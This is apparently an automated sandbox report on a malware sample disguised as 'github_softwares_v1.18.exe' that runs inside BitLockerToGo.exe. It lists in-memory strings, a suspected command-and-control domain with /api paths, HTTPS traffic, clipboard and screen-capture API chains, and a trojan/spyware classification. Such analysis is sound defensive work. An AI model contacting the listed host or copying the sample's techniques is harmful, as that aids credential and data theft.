Source: BitLockerToGo.exe, 00000001.00000003.1756837470.0000000002F02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: BitLockerToGo.exe, 00000001.00000003.1756837470.0000000002F02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: BitLockerToGo.exe, 00000001.00000003.1756837470.0000000002F02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: BitLockerToGo.exe, 00000001.00000003.1756837470.0000000002F02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: github_softwares_v1.18.exe	String found in binary or memory: https://gorm.io/docs/hooks.htmlWarning:
Source: BitLockerToGo.exe, 00000001.00000003.1756837470.0000000002F02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: BitLockerToGo.exe, 00000001.00000003.1730889198.0000000004FFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: BitLockerToGo.exe, 00000001.00000003.1756527742.00000000050F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: BitLockerToGo.exe, 00000001.00000003.1756527742.00000000050F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: BitLockerToGo.exe, 00000001.00000003.1730995668.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1730889198.0000000004FFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: BitLockerToGo.exe, 00000001.00000003.1730995668.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: BitLockerToGo.exe, 00000001.00000003.1730995668.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1730889198.0000000004FFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: BitLockerToGo.exe, 00000001.00000003.1730995668.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: BitLockerToGo.exe, 00000001.00000003.1743040571.0000000002EF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://weaknessmznxo.shop/
Source: BitLockerToGo.exe, 00000001.00000003.1777410523.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1777480522.0000000002E8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://weaknessmznxo.shop/((
Source: BitLockerToGo.exe, 00000001.00000002.1846072628.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1844557480.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://weaknessmznxo.shop/22
Source: BitLockerToGo.exe, 00000001.00000003.1754529360.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1756837470.0000000002F02000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1754816151.0000000002F02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://weaknessmznxo.shop/GHd
Source: BitLockerToGo.exe, 00000001.00000002.1846072628.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1844557480.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://weaknessmznxo.shop/H
Source: BitLockerToGo.exe, 00000001.00000003.1730674997.0000000002E8B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1743040571.0000000002EF5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.1846585558.0000000002EE3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1800001882.0000000002EE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://weaknessmznxo.shop/api
Source: BitLockerToGo.exe, 00000001.00000003.1716565174.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://weaknessmznxo.shop/api-L
Source: BitLockerToGo.exe, 00000001.00000003.1743040571.0000000002EF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://weaknessmznxo.shop/api0fB?
Source: BitLockerToGo.exe, 00000001.00000003.1754529360.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1772726652.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://weaknessmznxo.shop/apiBU
Source: BitLockerToGo.exe, 00000001.00000002.1846072628.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1844557480.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://weaknessmznxo.shop/h
Source: BitLockerToGo.exe, 00000001.00000003.1830856779.0000000002EF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://weaknessmznxo.shop:443/api
Source: BitLockerToGo.exe, 00000001.00000003.1730573797.0000000002E70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://weaknessmznxo.shop:443/api6
Source: BitLockerToGo.exe, 00000001.00000003.1756837470.0000000002F02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: BitLockerToGo.exe, 00000001.00000003.1756837470.0000000002F02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: BitLockerToGo.exe, 00000001.00000003.1756527742.00000000050F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: BitLockerToGo.exe, 00000001.00000003.1756527742.00000000050F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: BitLockerToGo.exe, 00000001.00000003.1756527742.00000000050F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: BitLockerToGo.exe, 00000001.00000003.1756527742.00000000050F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: BitLockerToGo.exe, 00000001.00000003.1756527742.00000000050F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: unknown	HTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49738 version: TLS 1.2

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 1_2_02A2F370 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

1_2_02A2F370

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 1_2_02A2F370 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

1_2_02A2F370

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 1_2_02A2F570 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

1_2_02A2F570

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1708564024.000000C0006DC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A0B260	1_2_02A0B260
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A34340	1_2_02A34340
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A23840	1_2_02A23840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A18184	1_2_02A18184
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A27970	1_2_02A27970
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A29EF2	1_2_02A29EF2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A04E70	1_2_02A04E70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A16E50	1_2_02A16E50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A22C10	1_2_02A22C10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A3A59A	1_2_02A3A59A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A1154C	1_2_02A1154C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A3CAB0	1_2_02A3CAB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A232B5	1_2_02A232B5
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A01A08	1_2_02A01A08
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A1F321	1_2_02A1F321
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A08330	1_2_02A08330
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A3B300	1_2_02A3B300
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A240B7	1_2_02A240B7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A3B090	1_2_02A3B090
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A1E80E	1_2_02A1E80E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A01051	1_2_02A01051
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A14188	1_2_02A14188
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A03990	1_2_02A03990
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A3B1D0	1_2_02A3B1D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A05920	1_2_02A05920
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A0F110	1_2_02A0F110
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A066B0	1_2_02A066B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A01EB0	1_2_02A01EB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A3AE80	1_2_02A3AE80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A3B630	1_2_02A3B630
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A2461E	1_2_02A2461E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A24643	1_2_02A24643
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A14F7A	1_2_02A14F7A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A06CA0	1_2_02A06CA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A04480	1_2_02A04480
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A2143B	1_2_02A2143B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A0BD80	1_2_02A0BD80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A275E0	1_2_02A275E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A3CDD0	1_2_02A3CDD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A3AD00	1_2_02A3AD00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_02A01566	1_2_02A01566

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: String function: 02A09600 appears 164 times

Source: github_softwares_v1.18.exe

Static PE information: Number of sections : 12 > 10

Source: github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C000580000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs github_softwares_v1.18.exe
Source: github_softwares_v1.18.exe, 00000000.00000002.1708247125.000000C000400000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs github_softwares_v1.18.exe
Source: github_softwares_v1.18.exe, 00000000.00000003.1701551736.0000014A798F0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs github_softwares_v1.18.exe
Source: github_softwares_v1.18.exe, 00000000.00000003.1701601425.0000014A798B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs github_softwares_v1.18.exe
Source: github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C0006A1000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs github_softwares_v1.18.exe

Source: 00000000.00000002.1708564024.000000C0006DC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research

Source: github_softwares_v1.18.exe

Binary string: bindm in unexpected GOOSrunqsteal: runq overflowdouble traceGCSweepStartbad use of trace.seqlockx509: malformed validityexec: Stdout already setexec: Stderr already setjson: unsupported type: invalid ticket length %dsql: statement is closedMon Jan _2 15:04:05 2006result must be a pointertext/html; charset=utf-8zlib: invalid dictionaryinvalid pattern syntax: address string too shortresource length too longunpacking Question.Classunexpected mantissa baseunexpected exponent baseRat.Scan: invalid syntaxindent can only be space%s%s is unsupported typeunknown address protocolinvalid address checksumcould not decode: %v: %wsha2-256-trunc254-paddedunmarshaling t.Owner: %wRemoveExpiredAllocations302231454903657293676544ConfirmSectorProofsValidunmarshaling t.Quota: %wVerifyDealsForActivationunmarshaling t.Label: %wunmarshaling t.Value: %wunmarshaling t.Actor: %wSubmitPoRepForBulkVerifyunmarshaling t.Miner: %wChangeMultiaddrsExportedExtendClaimTermsExportedhttp2: canceling requestunexpected buffer len=%vinvalid pseudo-header %qinvalid request :path %qapplication/octet-streamRequest Entity Too Largehttp: nil Request.HeaderstreamSafe was not resetValue kind is %s, not %s_html_template_urlfilteron range loop re-entry: at range loop continue: application/x-ecmascriptapplication/x-javascript(\$)(\{?([A-Z0-9_]+)\}?)ErrorHandler should exitduplicate %TAG directiveread handler must be setexceeded max depth of %dwhile scanning an anchorerror decrypting messagecertificate unobtainableTLS_RSA_WITH_RC4_128_SHAexpected float; found %s%s (and %d other errors)tabwriter: panic during \Device\NamedPipe\cygwinNotNestedGreaterGreater;token used before issuedtoken has invalid issuertoken has invalid claimsunbounded valkey message%s

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@2/1

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 1_2_02A2B2EB CoCreateInstance,

1_2_02A2B2EB

Source: C:\Users\user\Desktop\github_softwares_v1.18.exe

File created: C:\Users\Public\Libraries\mhgkj.scif

Jump to behavior

Source: C:\Users\user\Desktop\github_softwares_v1.18.exe

File opened: C:\Windows\system32\65ebcc9f5b8418f2c8843172241992038cf06349e5b1f11b7c097dd1e98b7546AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Jump to behavior

Source: github_softwares_v1.18.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\github_softwares_v1.18.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: github_softwares_v1.18.exe	String found in binary or memory: depgithub.com/filecoin-project/go-addressv1.1.0h1:ofdtUtEsNxkIxkDw67ecSmvtzaVSdcea4boAmLbnHfE=
Source: github_softwares_v1.18.exe	String found in binary or memory: depgithub.com/hashicorp/hc-installv0.7.1-0.20240607080111-03e0bd63529fh1:vRnx/KymAhdkO7+m1JgBWnf4B4C3Ex9AYXg3jOlll+8=
Source: github_softwares_v1.18.exe	String found in binary or memory: depgithub.com/ipfs/go-ipfs-ds-helpv1.1.0h1:yLE2w9RAsl31LtfMt91tRZcrx+e61O5mDxFRR994w4Q=
Source: github_softwares_v1.18.exe	String found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
Source: github_softwares_v1.18.exe	String found in binary or memory: &github.com/filecoin-project/go-address
Source: github_softwares_v1.18.exe	String found in binary or memory: asn1:"tag:0,optional"&func(x509.CertPool, time.Time) error&map.bucket[context.canceler]struct {}&github.com/filecoin-project/go-address&map.bucket[cid.Cid]*builtin.actorInfo
Source: github_softwares_v1.18.exe	String found in binary or memory: invalid escape code %q in stringgoogle/protobuf/descriptor.protoexceeded maximum recursion depthweak message %v is not linked in%v already implements proto.Enumfield %v has invalid nil pointercould not parse value for %v: %qcrypto/aes: output not full blockreflect: slice index out of rangereflect: NumOut of non-func type of method on nil interface valuereflect: Field index out of rangereflect: array index out of rangereflect.Value.Equal: invalid Kind to pointer to array with length CryptAcquireCertificatePrivateKeyGetVolumeNameForVolumeMountPointWInitializeProcThreadAttributeListSetupDiGetDeviceRegistryPropertyWSetupDiSetDeviceRegistryPropertyWImage base beyond allowed addressThunk AddressOfData beyond limitsCentral Kurdish Iraq (ku-Arab-IQ)Norwegian (Bokmal) Norway (nb-NO)could not find signer certificateinvalid VS_VERSION_INFO block. %s(\\)?(\$)(\()?\{?([A-Z0-9_]+)?\}?too many levels of symbolic links142108547152020037174224853515625710542735760100185871124267578125GODEBUG: no value specified for "bytes.Buffer.Grow: negative countbytes.Reader.Seek: invalid whenceslice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativeruntime: name offset out of rangeruntime: type offset out of rangesync: RUnlock of unlocked RWMutexcrypto: requested hash function #go package net: confVal.netCgo = skip everything and stop the walkwaiting for unsupported file typeencoding: missing byte order markx509: invalid RSA public exponentx509: SAN rfc822Name is malformedx509: invalid extended key usagesx509: no DEK-Info header in blockindefinite length found (not DER)struct contains unexported fieldssql: connection is already closedapplication/x-www-form-urlencodedtoo many Answers to pack (>65535)Float.GobDecode: buffer too smallSigEd25519 no Ed25519 collisions
Source: github_softwares_v1.18.exe	String found in binary or memory: invalid escape code %q in stringgoogle/protobuf/descriptor.protoexceeded maximum recursion depthweak message %v is not linked in%v already implements proto.Enumfield %v has invalid nil pointercould not parse value for %v: %qcrypto/aes: output not full blockreflect: slice index out of rangereflect: NumOut of non-func type of method on nil interface valuereflect: Field index out of rangereflect: array index out of rangereflect.Value.Equal: invalid Kind to pointer to array with length CryptAcquireCertificatePrivateKeyGetVolumeNameForVolumeMountPointWInitializeProcThreadAttributeListSetupDiGetDeviceRegistryPropertyWSetupDiSetDeviceRegistryPropertyWImage base beyond allowed addressThunk AddressOfData beyond limitsCentral Kurdish Iraq (ku-Arab-IQ)Norwegian (Bokmal) Norway (nb-NO)could not find signer certificateinvalid VS_VERSION_INFO block. %s(\\)?(\$)(\()?\{?([A-Z0-9_]+)?\}?too many levels of symbolic links142108547152020037174224853515625710542735760100185871124267578125GODEBUG: no value specified for "bytes.Buffer.Grow: negative countbytes.Reader.Seek: invalid whenceslice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativeruntime: name offset out of rangeruntime: type offset out of rangesync: RUnlock of unlocked RWMutexcrypto: requested hash function #go package net: confVal.netCgo = skip everything and stop the walkwaiting for unsupported file typeencoding: missing byte order markx509: invalid RSA public exponentx509: SAN rfc822Name is malformedx509: invalid extended key usagesx509: no DEK-Info header in blockindefinite length found (not DER)struct contains unexported fieldssql: connection is already closedapplication/x-www-form-urlencodedtoo many Answers to pack (>65535)Float.GobDecode: buffer too smallSigEd25519 no Ed25519 collisions
